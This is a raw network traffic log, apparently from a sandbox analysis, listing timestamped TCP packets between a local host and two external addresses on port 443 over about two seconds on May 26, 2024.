May 26, 2024 00:17:15.624927044 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.624994993 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.625019073 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.625060081 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.629060984 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.629127979 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.629133940 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.629167080 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.630086899 CEST	49745	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.630104065 CEST	443	49745	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.631064892 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.631156921 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.631257057 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.634267092 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.634303093 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.670217037 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.670341015 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:15.705805063 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:15.705885887 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.706163883 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.761892080 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:15.768039942 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:15.814503908 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.951102018 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.951160908 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.951225042 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.951263905 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.951309919 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.951401949 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.952989101 CEST	49748	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.953016996 CEST	443	49748	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.953284979 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.953319073 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.953366995 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.953862906 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:15.953876972 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.992611885 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.992676020 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:15.992763042 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:15.998728037 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:15.999943018 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.000004053 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.000355005 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.000638008 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.000704050 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.000756979 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.031097889 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.031646013 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.031666994 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.032004118 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.032460928 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.032527924 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.032850981 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.033978939 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.034387112 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.034449100 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.034496069 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.034514904 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.034811020 CEST	49749	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.034841061 CEST	443	49749	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.035340071 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.035423040 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.036571980 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.036653042 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.036817074 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.041229963 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.041248083 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.074503899 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.078497887 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.081824064 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.081886053 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.110003948 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.110035896 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.110174894 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.111051083 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.111062050 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.125351906 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.168450117 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.169161081 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.169225931 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.170139074 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.170212030 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.171016932 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.171084881 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.171510935 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.171529055 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.213416100 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.346494913 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.360557079 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.360579967 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.360940933 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.368551970 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.368621111 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.370193958 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.370213032 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.370266914 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.370347977 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.370348930 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.416903019 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.427963972 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.427988052 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.427994013 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.428066969 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.428081036 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.428092957 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.428141117 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.431808949 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.436691046 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.436711073 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.436784029 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.436798096 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.463721037 CEST	49751	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.463793039 CEST	443	49751	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.464227915 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.464277029 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.464433908 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.465507984 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.465523005 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.478504896 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480344057 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480370045 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480376959 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480391026 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480397940 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480406046 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480469942 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.480505943 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.480567932 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.486468077 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.486490965 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.486531019 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.486567974 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.486569881 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.486751080 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.487751961 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.519042015 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.519099951 CEST	443	49753	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.519136906 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.519171000 CEST	49753	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.519558907 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.519613028 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.519678116 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.520725965 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.520745993 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.540077925 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.540087938 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.540173054 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.540204048 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.540285110 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.542337894 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.542409897 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.542424917 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.542445898 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.542514086 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.545663118 CEST	49752	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.545695066 CEST	443	49752	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.546288013 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.546302080 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.546407938 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.547266960 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.547280073 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601702929 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601731062 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601737976 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601751089 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601777077 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601824045 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.601874113 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.601902962 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.601928949 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.610524893 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.610555887 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.610594988 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.610615969 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.610667944 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.675266027 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675292969 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675299883 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675324917 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675342083 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675379992 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.675399065 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.675441980 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.675441980 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.694442987 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.736943960 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.807164907 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.807430029 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.854198933 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.854208946 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.855427980 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.855458021 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.855513096 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.856762886 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.856772900 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.856833935 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.857398987 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.857426882 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.857479095 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.857760906 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.857767105 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.857815027 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.858072996 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.858079910 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.858103037 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.858130932 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.858170986 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.858496904 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.858501911 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.858551979 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.860181093 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.860196114 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.860438108 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.860450983 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.860929966 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.860944033 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.861453056 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.861466885 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.862565994 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.862799883 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.862915039 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.862926960 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.863452911 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.863462925 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.863821983 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.863830090 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.883223057 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.883238077 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.883521080 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:16.886792898 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:16.904604912 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.905498028 CEST	49754	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.905565023 CEST	443	49754	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.906122923 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.906161070 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.906222105 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.906786919 CEST	49755	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.906802893 CEST	443	49755	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.907403946 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.907412052 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.907457113 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.908761978 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.908772945 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.909511089 CEST	49769	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:16.909518003 CEST	443	49769	185.216.70.93	192.168.2.4
May 26, 2024 00:17:16.930516005 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:17.089791059 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.089818001 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.089828014 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.089909077 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.089947939 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.089947939 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.091135025 CEST	49757	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.091150999 CEST	443	49757	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.091692924 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.091722012 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.091778994 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.093579054 CEST	49770	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.093594074 CEST	443	49770	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.145298004 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:17.145369053 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:17.145446062 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:17.146229982 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:17.146244049 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:17.146260023 CEST	49758	443	192.168.2.4	184.28.90.27
May 26, 2024 00:17:17.146265030 CEST	443	49758	184.28.90.27	192.168.2.4
May 26, 2024 00:17:17.207119942 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.207595110 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.207606077 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.207901001 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.208319902 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.208370924 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.208411932 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.231725931 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.231940031 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.231952906 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.232264042 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.232661009 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.232717991 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.232783079 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.254494905 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.255537033 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.278501034 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.315890074 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.316147089 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.316163063 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.317096949 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.317154884 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.317419052 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.317473888 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.317542076 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.317550898 CEST	443	49761	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.364629030 CEST	49761	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.537558079 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.537580013 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.537627935 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.537641048 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.537651062 CEST	443	49759	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.537683964 CEST	49759	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.547579050 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.548409939 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.548425913 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.549489021 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.549546957 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.549632072 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.550451994 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.550528049 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.550625086 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.550632954 CEST	443	49765	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.550906897 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.550915003 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.551983118 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.552155972 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.557730913 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.562573910 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.567645073 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.569636106 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.586400032 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.586427927 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.586497068 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.586502075 CEST	443	49760	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.586549997 CEST	49760	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.591444969 CEST	49765	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.597917080 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.598331928 CEST	49764	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.598432064 CEST	443	49764	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.598536968 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.598551035 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.598658085 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.598665953 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.598690987 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.598697901 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.598880053 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.598889112 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.600128889 CEST	443	49762	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.600167990 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.600173950 CEST	49768	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.600200891 CEST	49762	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.600202084 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.600233078 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.600625038 CEST	443	49768	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.602293968 CEST	443	49763	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.602369070 CEST	49763	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.602588892 CEST	443	49767	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.602684021 CEST	49767	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.603123903 CEST	49766	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:17.603204966 CEST	443	49766	185.216.70.93	192.168.2.4
May 26, 2024 00:17:17.604816914 CEST	443	49769	185.216.70.93	192.168.2.4
